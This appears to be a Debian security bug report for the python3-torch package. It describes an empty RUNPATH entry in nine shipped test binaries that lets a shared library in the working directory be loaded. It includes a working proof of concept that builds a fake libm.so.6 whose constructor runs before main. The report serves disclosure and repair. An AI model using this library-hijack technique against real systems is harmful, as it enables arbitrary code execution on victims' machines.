Package: python3-torch
Version: 2.6.0+dfsg-9+b2
Severity: important
Tags: security
*Summary:*
The PyTorch distribution package (python3-torch) installs several compiled
C++ binaries under:
/usr/lib/python3/dist-packages/torch/bin/
Multiple binaries are built with an empty entry in their RUNPATH header,
which appears as a leading colon:
:$ORIGIN/../lib
An empty RUNPATH element causes the current working directory (CWD) to be
included in the dynamic loader's library search path. As a result, an
attacker may be able to achieve arbitrary code execution by placing a
malicious shared library in a directory and inducing a victim to execute
one of the affected binaries from that location.
This issue is an instance of CWE-426 (Untrusted Search Path).
*Impact:*
If a developer, researcher, or automated process executes one of the
affected binaries while its current working directory is
attacker-controlled (for example, a cloned repository, downloaded dataset,
extracted archive, shared workspace, or /tmp directory), the dynamic loader
may load attacker-controlled shared libraries from that directory.
Code execution occurs during dynamic library loading, prior to execution of
the program's main() function.
Affected Binaries
I tested 14 binaries shipped in torch/bin and successfully exploited the
following 9 binaries:
- test_api
- FileStoreTest
- HashStoreTest
- TCPStoreTest
- test_cpp_rpc
- test_dist_autograd
- test_edge_op_registration
- test_lazy
- test_tensorexpr
*Verification:*
$ readelf -d /usr/lib/python3/dist-packages/torch/bin/test_api | grep
RUNPATH
0x000000000000001d (RUNPATH) Library runpath: [:$ORIGIN/../lib]
The leading colon represents an empty RUNPATH element.
*Example:*
$ mkdir -p /tmp/malicious_workspace
$ cd /tmp/malicious_workspace
$ cat << 'EOF' > poc_libm.c
#include <stdio.h>
#include <stdlib.h>
__attribute__((constructor)) void exploit() {
printf("\n[!!!] PWNED: Arbitrary Code Execution Achieved! [!!!]\n");
exit(0);
}
EOF
$ gcc -shared -fPIC poc_libm.c -o libm.so.6
-Wl,-f,/lib/aarch64-linux-gnu/libm.so.6
$ cd /tmp/malicious_workspace
$ /usr/lib/python3/dist-packages/torch/bin/test_api
Result:
[!!!] PWNED: Arbitrary Code Execution Achieved! [!!!]
The binary loads the attacker-controlled libm.so.6 from the current working
directory and executes the library constructor during dynamic linking.
*Proposed Fix:*
The empty RUNPATH entry should be removed during packaging or build
generation so that the affected binaries no longer include the current
working directory in their library search path.
